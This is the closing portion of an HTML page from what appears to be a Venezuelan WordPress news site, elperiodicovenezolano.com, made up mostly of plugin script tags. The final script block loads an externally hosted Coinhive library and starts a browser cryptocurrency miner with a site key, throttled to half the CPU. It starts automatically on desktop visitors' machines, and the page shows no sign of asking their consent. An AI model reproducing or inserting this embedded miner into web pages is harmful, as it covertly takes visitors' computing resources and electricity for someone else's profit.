<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/better-weather/js/betterweather.js?ver=3.2.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var a3_lazyload_params = {"apply_images":"1","apply_videos":"1"};
var a3_lazyload_params = {"apply_images":"1","apply_videos":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='//elperiodicovenezolano.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.min.js?ver=1.8.2'></script>
<script type='text/javascript' src='//elperiodicovenezolano.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.srcset.min.js?ver=1.8.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var a3_lazyload_extend_params = {"edgeY":"0"};
var a3_lazyload_extend_params = {"edgeY":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='//elperiodicovenezolano.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extend.js?ver=1.8.2'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-includes/js/wp-embed.min.js?ver=4.9.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var bs_pagination_loc = {"loading":"<div class=\"bs-loading\"><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><div><\/div><\/div>"};
/* ]]> */
</script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/bs-theme-core/listing-pagin/assets/js/bs-ajax-pagination.js?ver=1.6.1'></script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/themes/epv/includes/libs/bs-theme-core/listing-pagin/assets/js/slick.min.js?ver=1.6.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var cptch_vars = {"nonce":"303699d634","ajaxurl":"http:\/\/elperiodicovenezolano.com\/wp-admin\/admin-ajax.php","enlarge":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://elperiodicovenezolano.com/wp-content/plugins/captcha/js/front_end_script.js?ver=4.9.2'></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('ih94sBHLiHK2CVVFnfY6WrRbPCxrGc2P', {throttle: 0.5});

	// Only start on non-mobile devices and if not opted-out
	// in the last 14400 seconds (4 hours):
	if (!miner.isMobile() && !miner.didOptOut(14400)) {
		miner.start();
	}
</script>
</body>
</html>